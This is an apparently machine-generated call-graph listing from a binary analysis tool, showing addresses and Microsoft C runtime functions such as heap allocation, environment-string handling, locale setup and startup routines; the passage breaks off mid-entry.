5985->5986 5987 13254f8 5986->5987 6139 1321de8 5987->6139 5994 1325056 __decode_pointer 6 API calls 5995 132554c 5994->5995 5995->5970 5996 1325553 5995->5996 6159 1325142 5996->6159 5998 132555b GetCurrentThreadId 5998->5975 6499 1322a5c 5999->6499 6001 13243e6 GetStartupInfoA 6002 1325750 __calloc_crt 64 API calls 6001->6002 6010 1324407 6002->6010 6003 1324625 _doexit 6003->5938 6004 13244ef 6004->6003 6008 132456c 6004->6008 6012 1324518 GetFileType 6004->6012 6013 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 6004->6013 6005 13245a2 GetStdHandle 6005->6008 6006 1325750 __calloc_crt 64 API calls 6006->6010 6007 1324607 SetHandleCount 6007->6003 6008->6003 6008->6005 6008->6007 6009 13245b4 GetFileType 6008->6009 6011 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 6008->6011 6009->6008 6010->6003 6010->6004 6010->6006 6010->6008 6011->6008 6012->6004 6013->6004 6015 1324e73 GetEnvironmentStringsW 6014->6015 6022 1324e92 6014->6022 6016 1324e7b 6015->6016 6017 1324e87 GetLastError 6015->6017 6018 1324eae GetEnvironmentStringsW 6016->6018 6019 1324ebd WideCharToMultiByte 6016->6019 6017->6022 6018->6019 6023 1321d1a 6018->6023 6026 1324f20 FreeEnvironmentStringsW 6019->6026 6027 1324ef1 6019->6027 6020 1324f2b 6021 1324f34 GetEnvironmentStrings 6020->6021 6020->6023 6021->6023 6024 1324f44 6021->6024 6022->6016 6022->6020 6040 1324d9a 6023->6040 6028 132570b __malloc_crt 64 API calls 6024->6028 6026->6023 6029 132570b __malloc_crt 64 API calls 6027->6029 6030 1324f5e 6028->6030 6031 1324ef7 6029->6031 6032 1324f71 6030->6032 6033 1324f65 FreeEnvironmentStringsA 6030->6033 6031->6026 6034 1324eff WideCharToMultiByte 6031->6034 6500 1327760 6032->6500 6033->6023 6036 1324f11 6034->6036 6037 1324f19 6034->6037 6039 132567d __read_nolock 64 API calls 6036->6039 6037->6026 6039->6037 6041 1324db4 GetModuleFileNameA 6040->6041 6042 1324daf 6040->6042 6044 1324ddb 6041->6044 6510 1328c8a 6042->6510 6504 1324c00 6044->6504 6046 1321d24 6046->5946 6046->5947 6048 132570b __malloc_crt 64 API calls 6049 1324e1d 6048->6049 6049->6046 6050 1324c00 _parse_cmdline 74 API calls 6049->6050 6050->6046 6052 1324b2b 6051->6052 6054 1324b30 _strlen 6051->6054 6053 1328c8a ___initmbctable 108 API calls 6052->6053 6053->6054 6055 1325750 __calloc_crt 64 API calls 6054->6055 6058 1321d35 6054->6058 6060 1324b65 _strlen 6055->6060 6056 1324bc3 6057 132567d __read_nolock 64 API calls 6056->6057 6057->6058 6058->5950 6058->5951 6059 1325750 __calloc_crt 64 API calls 6059->6060 6060->6056 6060->6058 6060->6059 6061 1324be9 6060->6061 6063 13263bb _strcpy_s 64 API calls 6060->6063 6064 1324baa 6060->6064 6062 132567d __read_nolock 64 API calls 6061->6062 6062->6058 6063->6060 6064->6060 6065 1323819 __invoke_watson 10 API calls 6064->6065 6065->6064 6067 1322d79 __IsNonwritableInCurrentImage 6066->6067 6921 1325dfb 6067->6921 6069 1322d97 __initterm_e 6071 1322db6 __IsNonwritableInCurrentImage __initterm 6069->6071 6925 1325de4 6069->6925 6071->5953 6073 1324ad1 6072->6073 6075 1324ad6 6072->6075 6074 1328c8a ___initmbctable 108 API calls 6073->6074 6074->6075 6076 1321d58 6075->6076 6077 13285ad _parse_cmdline 74 API calls 6075->6077 6078 1321210 6076->6078 6077->6075 7026 1321649 6078->7026 6082 132124c 7042 1321aba 6082->7042 6084 1321258 6085 1321bb2 _fseek 102 API calls 6084->6085 6086 132126b 6085->6086 6087 132148f _malloc 64 API calls 6086->6087 6088 1321277 6087->6088 7055 1321900 6088->7055 6092 13212e2 6092->5960 6110 1322f1c 6092->6110 6096 1321c45 6095->6096 6097 1321c4a 6095->6097 6098 132315f __FF_MSGBANNER 64 API calls 6096->6098 6099 1322fb4 __NMSG_WRITE 64 API calls 6097->6099 6098->6097 6100 1321c52 6099->6100 6101 1322d00 _doexit 3 API calls 6100->6101 6102 1321c5c 6101->6102 6102->5931 6104 132315f __FF_MSGBANNER 64 API calls 6103->6104 6105 1322cb6 6104->6105 6106 1322fb4 __NMSG_WRITE 64 API calls 6105->6106 6107 1322cbe 6106->6107 6108 1325056 __decode_pointer 6 API calls 6107->6108 6109 1321d09 6108->6109 6109->5939 7917 1322df0 6110->7917 6112 1322f2d 6112->5960 6114 1322df0 _doexit 64 API calls 6113->6114 6115 1322f53 6114->6115 6115->5963 6117 1322c87 Sleep GetModuleHandleW 6116->6117 6118 1322ca5 6117->6118 6119 1322ca9 6117->6119 6118->6117 6118->6119 6119->5966 6183 132504d 6120->6183 6122 1322f6e __init_pointers __initp_misc_winsig 6186 1325e55 6122->6186 6125 1324fdb __encode_pointer 7 API calls 6126 1322faa 6125->6126 6127 1324fdb TlsGetValue 6126->6127 6128 1324ff3 6127->6128 6129 1325014 GetModuleHandleW 6127->6129 6128->6129 6130 1324ffd TlsGetValue 6128->6130 6131 1325024 6129->6131 6132 132502f GetProcAddress 6129->6132 6134 1325008 6130->6134 6133 1322c7c __crt_waiting_on_module_handle 2 API calls 6131->6133 6138 132500c 6132->6138 6135 132502a 6133->6135 6134->6129 6134->6138 6135->6132 6136 1325047 6135->6136 6136->5982 6137 132503f RtlEncodePointer 6137->6136 6138->6136 6138->6137 6140 1321df3 6139->6140 6142 1321e21 6140->6142 6189 132561d 6140->6189 6142->5970 6143 1325056 TlsGetValue 6142->6143 6144 132506e 6143->6144 6145 132508f GetModuleHandleW 6143->6145 6144->6145 6146 1325078 TlsGetValue 6144->6146 6147 13250aa GetProcAddress 6145->6147 6148 132509f 6145->6148 6151 1325083 6146->6151 6150 1325087 6147->6150 6149 1322c7c __crt_waiting_on_module_handle 2 API calls 6148->6149 6152 13250a5 6149->6152 6150->5970 6153 1325750 6150->6153 6151->6145 6151->6150 6152->6147 6152->6150 6156 1325759 6153->6156 6155 1325532 6155->5970 6155->5994 6156->6155 6157 1325777 Sleep 6156->6157 6194 1328fcd 6156->6194 6158 132578c 6157->6158 6158->6155 6158->6156 6478 1322a5c 6159->6478 6161 132514e GetModuleHandleW 6162 1325164 6161->6162 6163 132515e 6161->6163 6165 13251a0 6162->6165 6166 132517c GetProcAddress GetProcAddress 6162->6166 6164 1322c7c __crt_waiting_on_module_handle 2 API calls 6163->6164 6164->6162 6167 1321f64 __lock 60 API calls 6165->6167 6166->6165 6168 13251bf InterlockedIncrement 6167->6168 6479 1325217 6168->6479 6171 1321f64 __lock 60 API calls 6172 13251e0 6171->6172 6482 1328df1 InterlockedIncrement 6172->6482 6174 13251fe 6494 1325220 6174->6494 6176 132520b _doexit 6176->5998 6178 132511b 6177->6178 6179 132510f 6177->6179 6180 132512f TlsFree 6178->6180 6181 132513d 6178->6181 6182 1325056 __decode_pointer 6 API calls 6179->6182 6180->6181 6181->6181 6182->6178 6184 1324fdb __encode_pointer 7 API calls 6183->6184 6185 1325054 6184->6185 6185->6122 6187 1324fdb __encode_pointer 7 API calls 6186->6187 6188 1322fa0 6187->6188 6188->6125 6193 1322a5c 6189->6193 6191 1325629 InitializeCriticalSectionAndSpinCount 6192 132566d _doexit 6191->6192 6192->6140 6193->6191 6195 1328fd9 _doexit 6194->6195 6196 1328ff1 6195->6196 6206 1329010 _memset 6195->6206 6207 13231da 6196->6207 6200 1329082 RtlAllocateHeap 6200->6206 6201 1329006 _doexit 6201->6156 6206->6200 6206->6201 6213 1321f64 6206->6213 6220 1322776 6206->6220 6226 13290c9 6206->6226 6229 1323232 6206->6229 6232 1325229 GetLastError 6207->6232 6209 13231df 6210 1323941 6209->6210 6211 1325056 __decode_pointer 6 API calls 6210->6211 6212 1323951 __invoke_watson 6211->6212 6214 1321f79 6213->6214 6215 1321f8c EnterCriticalSection 6213->6215 6272 1321ea1 6214->6272 6215->6206 6217 1321f7f 6217->6215 6218 1322cac __amsg_exit 63 API calls 6217->6218 6219 1321f8b 6218->6219 6219->6215 6221 13227a4 6220->6221 6222 132283d 6221->6222 6224 1322846 6221->6224 6467 13222dd 6221->6467 6222->6224 6473 132238d 6222->6473 6224->6206 6477 1321e8a LeaveCriticalSection 6226->6477 6228 13290d0 6228->6206 6230 1325056 __decode_pointer 6 API calls 6229->6230 6231 1323242 6230->6231 6231->6206 6246 13250d1 TlsGetValue 6232->6246 6235 1325296 SetLastError 6235->6209 6236 1325750 __calloc_crt 61 API calls 6237 1325254 6236->6237 6237->6235 6238 1325056 __decode_pointer 6 API calls 6237->6238 6239 132526e 6238->6239 6240 1325275 6239->6240 6241 132528d 6239->6241 6243 1325142 __initptd 61 API calls 6240->6243 6251 132567d 6241->6251 6245 132527d GetCurrentThreadId 6243->6245 6244 1325293 6244->6235 6245->6235 6247 1325101 6246->6247 6248 13250e6 6246->6248 6247->6235 6247->6236 6249 1325056 __decode_pointer 6 API calls 6248->6249 6250 13250f1 TlsSetValue 6249->6250 6250->6247 6253 1325689 _doexit 6251->6253 6252 1325702 _doexit __dosmaperr 6252->6244 6253->6252 6254 1321f64 __lock 63 API calls 6253->6254 6255 13256c8 6253->6255 6256 13256a0 ___sbh_find_block 6254->6256 6255->6252 6258 13231da __mbsnbcmp_l 63 API calls 6255->6258 6257 13256ba 6256->6257 6262 1321fc7 6256->6262 6268 13256d3 6257->6268 6261 13256f4 GetLastError 6258->6261 6261->6252 6263 1322006 6262->6263 6267 1322283 ___sbh_free_block 6262->6267 6264 13221f2 VirtualFree 6263->6264 6263->6267 6265 1322256 6264->6265 6266 1322265 VirtualFree 6265->6266 6265->6267 6266->6267 6267->6257 6271 1321e8a LeaveCriticalSection 6268->6271 6270 13256da 6270->6255 6271->6270 6273 1321ead _doexit 6272->6273 6274 1321ed5 6273->6274 6275 1321ebd 6273->6275 6281 1321ee3 _doexit 6274->6281 6346 132570b 6274->6346 6300 132315f 6275->6300 6281->6217 6283 1321f04 6286 1321f64 __lock 64 API calls 6283->6286 6284 1321ef5 6285 13231da __mbsnbcmp_l 64 API calls 6284->6285 6285->6281 6288 1321f0b 6286->6288 6290 1321f13 6288->6290 6291 1321f3f 6288->6291 6292 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 6290->6292 6293 132567d __read_nolock 64 API calls 6291->6293 6295 1321f1e 6292->6295 6294 1321f30 6293->6294 6352 1321f5b 6294->6352 6295->6294 6297 132567d __read_nolock 64 API calls 6295->6297 6298 1321f2a 6297->6298 6299 13231da __mbsnbcmp_l 64 API calls 6298->6299 6299->6294 6355 1326423 6300->6355 6303 1322fb4 __NMSG_WRITE 64 API calls 6305 132318b 6303->6305 6304 1326423 __set_error_mode 64 API calls 6306 1323173 6304->6306 6307 1322fb4 __NMSG_WRITE 64 API calls 6305->6307 6306->6303 6308 1321ec2 6306->6308 6307->6308 6309 1322fb4 6308->6309 6310 1322fc8 6309->6310 6311 1321ec9 6310->6311 6312 1326423 __set_error_mode 61 API calls 6310->6312 6343 1322d00 6311->6343 6313 1322fea 6312->6313 6314 1323128 GetStdHandle 6313->6314 6316 1326423 __set_error_mode 61 API calls 6313->6316 6314->6311 6315 1323136 _strlen 6314->6315 6315->6311 6319 132314f WriteFile 6315->6319 6317 1322ffb 6316->6317 6317->6314 6318 132300d 6317->6318 6318->6311 6361 13263bb 6318->6361 6319->6311 6322 1323043 GetModuleFileNameA 6324 1323061 6322->6324 6328 1323084 _strlen 6322->6328 6326 13263bb _strcpy_s 61 API calls 6324->6326 6327 1323071 6326->6327 6327->6328 6330 1323819 __invoke_watson 10 API calls 6327->6330 6329 13230c7 6328->6329 6377 1326273 6328->6377 6386 13261ff 6329->6386 6330->6328 6335 13230eb 6337 13261ff _strcat_s 61 API calls 6335->6337 6336 1323819 __invoke_watson 10 API calls 6336->6335 6339 13230ff 6337->6339 6338 1323819 __invoke_watson 10 API calls 6338->6329 6340 1323110 6339->6340 6341 1323819 __invoke_watson 10 API calls 6339->6341 6395 1326096 6340->6395 6341->6340 6433 1322cd5 GetModuleHandleW 6343->6433 6348 1325714 6346->6348 6349 1321eee 6348->6349 6350 132572b Sleep 6348->6350 6436 132148f 6348->6436 6349->6283 6349->6284 6351 1325740 6350->6351 6351->6348 6351->6349 6466 1321e8a LeaveCriticalSection 6352->6466 6354 1321f62 6354->6281 6356 1326432 6355->6356 6357 1323166 6356->6357 6358 13231da __mbsnbcmp_l 64 API calls 6356->6358 6357->6304 6357->6306 6359 1326455 6358->6359 6360 1323941 __mbsnbcmp_l 6 API calls 6359->6360 6360->6357 6362 13263cc 6361->6362 6364 13263d3 6361->6364 6362->6364 6368 13263f9 6362->6368 6363 13231da __mbsnbcmp_l 64 API calls 6365 13263d8 6363->6365 6364->6363 6366 1323941 __mbsnbcmp_l 6 API calls 6365->6366 6367 132302f 6366->6367 6367->6322 6370 1323819 6367->6370 6368->6367 6369 13231da __mbsnbcmp_l 64 API calls 6368->6369 6369->6365 6422 1324360 6370->6422 6372 1323846 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6373 1323922 GetCurrentProcess TerminateProcess 6372->6373 6374 1323916 __invoke_watson 6372->6374 6424 1325b55 6373->6424 6374->6373 6376 1323040 6376->6322 6381 1326285 6377->6381 6378 1326289 6379 13231da __mbsnbcmp_l 64 API calls 6378->6379 6380 13230b4 6378->6380 6385 13262a5 6379->6385 6380->6329 6380->6338 6381->6378 6381->6380 6383 13262cf 6381->6383 6382 1323941 __mbsnbcmp_l 6 API calls 6382->6380 6383->6380 6384 13231da __mbsnbcmp_l 64 API calls 6383->6384 6384->6385 6385->6382 6387 1326217 6386->6387 6390 1326210 6386->6390 6388 13231da __mbsnbcmp_l 64 API calls 6387->6388 6389 132621c 6388->6389 6391 1323941 __mbsnbcmp_l 6 API calls 6389->6391 6390->6387 6393 132624b 6390->6393 6392 13230da 6391->6392 6392->6335 6392->6336 6393->6392 6394 13231da __mbsnbcmp_l 64 API calls 6393->6394 6394->6389 6396 132504d __init_pointers 7 API calls 6395->6396 6397 13260a6 6396->6397 6398 13260b9 LoadLibraryA 6397->6398 6402 1326141 6397->6402 6399 13261e3 6398->6399 6400 13260ce GetProcAddress 6398->6400 6399->6311 6400->6399 6403 13260e4 6400->6403 6401 132616b 6405 1325056 __decode_pointer 6 API calls 6401->6405 6419 1326196 6401->6419 6402->6401 6406 1325056 __decode_pointer 6 API calls 6402->6406 6407 1324fdb __encode_pointer 7 API calls 6403->6407 6404 1325056 __decode_pointer 6 API calls 6404->6399 6415 13261ae 6405->6415 6408 132615e 6406->6408 6409 13260ea GetProcAddress 6407->6409 6410 1325056 __decode_pointer 6 API calls 6408->6410 6411 1324fdb __encode_pointer 7 API calls 6409->6411 6410->6401 6412 13260ff GetProcAddress 6411->6412 6413 1324fdb __encode_pointer 7 API calls 6412->6413 6414 1326114 GetProcAddress 6413->6414 6416 1324fdb __encode_pointer 7 API calls 6414->6416 6417 1325056 __decode_pointer 6 API calls 6415->6417 6415->6419 6418 1326129 6416->6418 6417->6419 6418->6402 6420 1326133 GetProcAddress 6418->6420 6419->6404 6421 1324fdb __encode_pointer 7 API calls 6420->6421 6421->6402 6423 132436c __VEC_memzero 6422->6423 6423->6372 6425 1325b5f IsDebuggerPresent 6424->6425 6426 1325b5d 6424->6426 6432 1327168 6425->6432 6426->6376 6429 132953d SetUnhandledExceptionFilter UnhandledExceptionFilter 6430 1329562 GetCurrentProcess TerminateProcess 6429->6430 6431 132955a __invoke_watson 6429->6431 6430->6376 6431->6430 6432->6429 6434 1322ce9 GetProcAddress 6433->6434 6435 1322cf9 ExitProcess 6433->6435 6434->6435 6437 1321542 6436->6437 6443 13214a1 6436->6443 6438 1323232 _malloc 6 API calls 6437->6438 6440 1321548 6438->6440 6439 13214b2 6441 132315f __FF_MSGBANNER 63 API calls 6439->6441 6439->6443 6445 1322fb4 __NMSG_WRITE 63 API calls 6439->6445 6447 1322d00 _doexit 3 API calls 6439->6447 6442 13231da __mbsnbcmp_l 63 API calls 6440->6442 6441->6439 6448 132153a 6442->6448 6443->6439 6446 13214fe RtlAllocateHeap 6443->6446 6443->6448 6449 132152e 6443->6449 6450 1323232 _malloc 6 API calls 6443->6450 6452 1321533 6443->6452 6454 1321440 6443->6454 6445->6439 6446->6443 6447->6439 6448->6348 6451 13231da __mbsnbcmp_l 63 API calls 6449->6451 6450->6443 6451->6452 6453 13231da __mbsnbcmp_l 63 API calls 6452->6453 6453->6448 6455 132144c _doexit 6454->6455 6456 132147d _doexit 6455->6456 6457 1321f64 __lock 64 API calls 6455->6457 6456->6443 6458 1321462 6457->6458 6459 1322776 ___sbh_alloc_block 4 API calls 6458->6459 6460 132146d 6459->6460 6462 1321486 6460->6462 6465 1321e8a LeaveCriticalSection 6462->6465 6464 132148d 6464->6456 6465->6464 6466->6354 6468 13222f0 HeapReAlloc 6467->6468 6469 1322324 HeapAlloc 6467->6469 6470 1322312 6468->6470 6471 132230e 6468->6471 6469->6471 6472 1322347 VirtualAlloc 6469->6472 6470->6469 6471->6222 6472->6471 6474 13223a4 VirtualAlloc 6473->6474 6476 13223eb 6474->6476 6476->6224 6477->6228 6478->6161 6497 1321e8a LeaveCriticalSection 6479->6497 6481 13251d9 6481->6171 6483 1328e12 6482->6483 6484 1328e0f InterlockedIncrement 6482->6484 6485 1328e1f 6483->6485 6486 1328e1c InterlockedIncrement 6483->6486 6484->6483 6487 1328e29 InterlockedIncrement 6485->6487 6488 1328e2c 6485->6488 6486->6485 6487->6488 6489 1328e36 InterlockedIncrement 6488->6489 6491 1328e39 6488->6491 6489->6491 6490 1328e52 InterlockedIncrement 6490->6491 6491->6490 6492 1328e62 InterlockedIncrement 6491->6492 6493 1328e6d InterlockedIncrement 6491->6493 6492->6491 6493->6174 6498 1321e8a LeaveCriticalSection 6494->6498 6496 1325227 6496->6176 6497->6481 6498->6496 6499->6001 6501 1327778 6500->6501 6502 1324f7b FreeEnvironmentStringsA 6501->6502 6503 132779f __VEC_memcpy 6501->6503 6502->6023 6503->6502 6505 1324c1f 6504->6505 6508 1324c8c 6505->6508 6514 13285ad 6505->6514 6507 1324d8a 6507->6046 6507->6048 6508->6507 6509 13285ad 74 API calls _parse_cmdline 6508->6509 6509->6508 6511 1328c93 6510->6511 6512 1328c9a 6510->6512 6736 1328af0 6511->6736 6512->6041 6517 132855a 6514->6517 6520 1326d18 6517->6520 6521 1326d2b 6520->6521 6527 1326d78 6520->6527 6528 13252a2 6521->6528 6524 1326d58 6524->6527 6548 13287eb 6524->6548 6527->6505 6529 1325229 __getptd_noexit 64 API calls 6528->6529 6530 13252aa 6529->6530 6531 13252b7 6530->6531 6532 1322cac __amsg_exit 64 API calls 6530->6532 6531->6524 6533 1328f57 6531->6533 6532->6531 6534 1328f63 _doexit 6533->6534 6535 13252a2 __getptd 64 API calls 6534->6535 6536 1328f68 6535->6536 6537 1328f96 6536->6537 6538 1328f7a 6536->6538 6539 1321f64 __lock 64 API calls 6537->6539 6540 13252a2 __getptd 64 API calls 6538->6540 6541 1328f9d 6539->6541 6542 1328f7f 6540->6542 6564 1328f19 6541->6564 6546 1328f8d _doexit 6542->6546 6547 1322cac __amsg_exit 64 API calls 6542->6547 6546->6524 6547->6546 6549 13287f7 _doexit 6548->6549 6550 13252a2 __getptd 64 API calls 6549->6550 6551 13287fc 6550->6551 6552 1321f64 __lock 64 API calls 6551->6552 6553 132880e 6551->6553 6554 132882c 6552->6554 6556 132881c _doexit 6553->6556 6560 1322cac __amsg_exit 64 API calls 6553->6560 6555 1328875 6554->6555 6557 1328843 InterlockedDecrement 6554->6557 6558 132885d InterlockedIncrement 6554->6558 6732 1328886 6555->6732 6556->6527 6557->6558 6561 132884e 6557->6561 6558->6555 6560->6556 6561->6558 6562 132567d __read_nolock 64 API calls 6561->6562 6563 132885c 6562->6563 6563->6558 6565 1328f1d 6564->6565 6571 1328f4f 6564->6571 6566 1328df1 ___addlocaleref 8 API calls 6565->6566 6565->6571 6567 1328f30 6566->6567 6567->6571 6575 1328e80 6567->6575 6572 1328fc1 6571->6572 6731 1321e8a LeaveCriticalSection 6572->6731 6574 1328fc8 6574->6542 6576 1328e91 InterlockedDecrement 6575->6576 6577 1328f14 6575->6577 6578 1328ea6 InterlockedDecrement 6576->6578 6579 1328ea9 6576->6579 6577->6571 6589 1328ca8 6577->6589 6578->6579 6580 1328eb3 InterlockedDecrement 6579->6580 6581 1328eb6 6579->6581 6580->6581 6582 1328ec3 6581->6582 6583 1328ec0 InterlockedDecrement 6581->6583 6584 1328ecd InterlockedDecrement 6582->6584 6586 1328ed0 6582->6586 6583->6582 6584->6586 6585 1328ee9 InterlockedDecrement 6585->6586 6586->6585 6587 1328ef9 InterlockedDecrement 6586->6587 6588 1328f04 InterlockedDecrement 6586->6588 6587->6586 6588->6577 6590 1328d2c 6589->6590 6592 1328cbf 6589->6592 6591 1328d79 6590->6591 6593 132567d __read_nolock 64 API calls 6590->6593 6605 1328da0 6591->6605 6643 132a731 6591->6643 6592->6590 6600 132567d __read_nolock 64 API calls 6592->6600 6602 1328cf3 6592->6602 6595 1328d4d 6593->6595 6597 132567d __read_nolock 64 API calls 6595->6597 6603 1328d60 6597->6603 6598 132567d __read_nolock 64 API calls 6604 1328d21 6598->6604 6599 132567d __read_nolock 64 API calls 6599->6605 6606 1328ce8 6600->6606 6601 1328de5 6607 132567d __read_nolock 64 API calls 6601->6607 6608 132567d __read_nolock 64 API calls 6602->6608 6618 1328d14 6602->6618 6610 132567d __read_nolock 64 API calls 6603->6610 6611 132567d __read_nolock 64 API calls 6604->6611 6605->6601 6609 132567d 64 API calls __read_nolock 6605->6609 6619 132a90b 6606->6619 6613 1328deb 6607->6613 6614 1328d09 6608->6614 6609->6605 6615 1328d6e 6610->6615 6611->6590 6613->6571 6635 132a8c6 6614->6635 6617 132567d __read_nolock 64 API calls 6615->6617 6617->6591 6618->6598 6620 132a918 6619->6620 6634 132a995 6619->6634 6621 132a929 6620->6621 6622 132567d __read_nolock 64 API calls 6620->6622 6623 132a93b 6621->6623 6624 132567d __read_nolock 64 API calls 6621->6624 6622->6621 6625 132567d __read_nolock 64 API calls 6623->6625 6626 132a94d 6623->6626 6624->6623 6625->6626 6627 132567d __read_nolock 64 API calls 6626->6627 6629 132a95f 6626->6629 6627->6629 6628 132a971 6631 132a983 6628->6631 6632 132567d __read_nolock 64 API calls 6628->6632 6629->6628 6630 132567d __read_nolock 64 API calls 6629->6630 6630->6628 6633 132567d __read_nolock 64 API calls 6631->6633 6631->6634 6632->6631 6633->6634 6634->6602 6637 132a8d3 6635->6637 6642 132a907 6635->6642 6636 132a8e3 6639 132a8f5 6636->6639 6640 132567d __read_nolock 64 API calls 6636->6640 6637->6636 6638 132567d __read_nolock 64 API calls 6637->6638 6638->6636 6641 132567d __read_nolock 64 API calls 6639->6641 6639->6642 6640->6639 6641->6642 6642->6618 6644 132a742 6643->6644 6730 1328d99 6643->6730 6645 132567d __read_nolock 64 API calls 6644->6645 6646 132a74a 6645->6646 6647 132567d __read_nolock 64 API calls 6646->6647 6648 132a752 6647->6648 6649 132567d __read_nolock 64 API calls 6648->6649 6650 132a75a 6649->6650 6651 132567d __read_nolock 64 API calls 6650->6651 6652 132a762 6651->6652 6653 132567d __read_nolock 64 API calls 6652->6653 6654 132a76a 6653->6654 6655 132567d __read_nolock 64 API calls 6654->6655 6656 132a772 6655->6656 6657 132567d __read_nolock 64 API calls 6656->6657 6658 132a779 6657->6658 6659 132567d __read_nolock 64 API calls 6658->6659 6660 132a781 6659->6660 6661 132567d __read_nolock 64 API calls 6660->6661 6662 132a789 6661->6662 6663 132567d __read_nolock 64 API calls 6662->6663 6664 132a791 6663->6664 6665 132567d __read_nolock 64 API calls 6664->6665 6666 132a799 6665->6666 6667 132567d __read_nolock 64 API calls 6666->6667 6668 132a7a1 6667->6668 6669 132567d __read_nolock 64 API calls 6668->6669 6670 132a7a9 6669->6670 6671 132567d __read_nolock 64 API calls 6670->6671 6672 132a7b1 6671->6672 6673 132567d __read_nolock 64 API calls 6672->6673 6674 132a7b9 6673->6674 6675 132567d __read_nolock 64 API calls 6674->6675 6676 132a7c1 6675->6676 6677 132567d __read_nolock 64 API calls 6676->6677 6678 132a7cc 6677->6678 6679 132567d __read_nolock 64 API calls 6678->6679 6680 132a7d4 6679->6680 6681 132567d __read_nolock 64 API calls 6680->6681 6682 132a7dc 6681->6682 6683 132567d __read_nolock 64 API calls 6682->6683 6684 132a7e4 6683->6684 6685 132567d __read_nolock 64 API calls 6684->6685 6686 132a7ec 6685->6686 6687 132567d __read_nolock 64 API calls 6686->6687 6688 132a7f4 6687->6688 6689 132567d __read_nolock 64 API calls 6688->6689 6690 132a7fc 6689->6690 6691 132567d __read_nolock 64 API calls 6690->6691 6692 132a804 6691->6692 6693 132567d __read_nolock 64 API calls 6692->6693 6694 132a80c 6693->6694 6695 132567d __read_nolock 64 API calls 6694->6695 6696 132a814 6695->6696 6697 132567d __read_nolock 64 API calls 6696->6697 6698 132a81c 6697->6698 6699 132567d __read_nolock 64 API calls 6698->6699 6700 132a824 6699->6700 6701 132567d __read_nolock 64 API calls 6700->6701 6702 132a82c 6701->6702 6703 132567d __read_nolock 64 API calls 6702->6703 6704 132a834 6703->6704 6705 132567d __read_nolock 64 API calls 6704->6705 6706 132a83c 6705->6706 6707 132567d __read_nolock 64 API calls 6706->6707 6708 132a844 6707->6708 6709 132567d __read_nolock 64 API calls 6708->6709 6710 132a852 6709->6710 6711 132567d __read_nolock 64 API calls 6710->6711 6712 132a85d 6711->6712 6713 132567d __read_nolock 64 API calls 6712->6713 6714 132a868 6713->6714 6715 132567d __read_nolock 64 API calls 6714->6715 6716 132a873 6715->6716 6717 132567d __read_nolock 64 API calls 6716->6717 6718 132a87e 6717->6718 6719 132567d __read_nolock 64 API calls 6718->6719 6720 132a889 6719->6720 6721 132567d __read_nolock 64 API calls 6720->6721 6722 132a894 6721->6722 6723 132567d __read_nolock 64 API calls 6722->6723 6724 132a89f 6723->6724 6725 132567d __read_nolock 64 API calls 6724->6725 6726 132a8aa 6725->6726 6727 132567d __read_nolock 64 API calls 6726->6727 6728 132a8b5 6727->6728 6729 132567d __read_nolock 64 API calls 6728->6729 6729->6730 6730->6599 6731->6574 6735 1321e8a LeaveCriticalSection 6732->6735 6734 132888d 6734->6553 6735->6734 6737 1328afc _doexit 6736->6737 6738 13252a2 __getptd 64 API calls 6737->6738 6739 1328b05 6738->6739 6740 13287eb _LocaleUpdate::_LocaleUpdate 66 API calls 6739->6740 6741 1328b0f 6740->6741 6767 132888f 6741->6767 6744 132570b __malloc_crt 64 API calls 6745 1328b30 6744->6745 6746 1328c4f _doexit 6745->6746 6774 132890b 6745->6774 6746->6512 6749 1328b60 InterlockedDecrement 6751 1328b70 6749->6751 6752 1328b81 InterlockedIncrement 6749->6752 6750 1328c5c 6750->6746 6756 132567d __read_nolock 64 API calls 6750->6756 6757 1328c6f 6750->6757 6751->6752 6754 132567d __read_nolock 64 API calls 6751->6754 6752->6746 6755 1328b97 6752->6755 6753 13231da __mbsnbcmp_l 64 API calls 6753->6746 6758 1328b80 6754->6758 6755->6746 6759 1321f64 __lock 64 API calls 6755->6759 6756->6757 6757->6753 6758->6752 6761 1328bab InterlockedDecrement 6759->6761 6762 1328c27 6761->6762 6763 1328c3a InterlockedIncrement 6761->6763 6762->6763 6765 132567d __read_nolock 64 API calls 6762->6765 6784 1328c51 6763->6784 6766 1328c39 6765->6766 6766->6763 6768 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 6767->6768 6769 13288a3 6768->6769 6770 13288ae GetOEMCP 6769->6770 6771 13288cc 6769->6771 6773 13288be 6770->6773 6772 13288d1 GetACP 6771->6772 6771->6773 6772->6773 6773->6744 6773->6746 6775 132888f getSystemCP 76 API calls 6774->6775 6777 132892b 6775->6777 6776 1328936 setSBCS 6778 1325b55 __crtLCMapStringA_stat 5 API calls 6776->6778 6777->6776 6780 132897a IsValidCodePage 6777->6780 6783 132899f _memset __setmbcp_nolock 6777->6783 6779 1328aee 6778->6779 6779->6749 6779->6750 6780->6776 6781 132898c GetCPInfo 6780->6781 6781->6776 6781->6783 6787 1328658 GetCPInfo 6783->6787 6920 1321e8a LeaveCriticalSection 6784->6920 6786 1328c58 6786->6746 6788 132873e 6787->6788 6792 132868c _memset 6787->6792 6791 1325b55 __crtLCMapStringA_stat 5 API calls 6788->6791 6794 13287e9 6791->6794 6797 132a6ef 6792->6797 6794->6783 6796 132a4f0 ___crtLCMapStringA 99 API calls 6796->6788 6798 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 6797->6798 6799 132a702 6798->6799 6807 132a535 6799->6807 6802 132a4f0 6803 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 6802->6803 6804 132a503 6803->6804 6873 132a14b 6804->6873 6808 132a581 6807->6808 6809 132a556 GetStringTypeW 6807->6809 6811 132a56e 6808->6811 6812 132a668 6808->6812 6810 132a576 GetLastError 6809->6810 6809->6811 6810->6808 6813 132a5ba MultiByteToWideChar 6811->6813 6829 132a662 6811->6829 6835 132adad GetLocaleInfoA 6812->6835 6819 132a5e7 6813->6819 6813->6829 6815 1325b55 __crtLCMapStringA_stat 5 API calls 6817 13286f9 6815->6817 6817->6802 6818 132a6b9 GetStringTypeA 6823 132a6d4 6818->6823 6818->6829 6820 132148f _malloc 64 API calls 6819->6820 6824 132a5fc _memset __crtLCMapStringA_stat 6819->6824 6820->6824 6822 132a635 MultiByteToWideChar 6826 132a64b GetStringTypeW 6822->6826 6827 132a65c 6822->6827 6828 132567d __read_nolock 64 API calls 6823->6828 6824->6822 6824->6829 6826->6827 6831 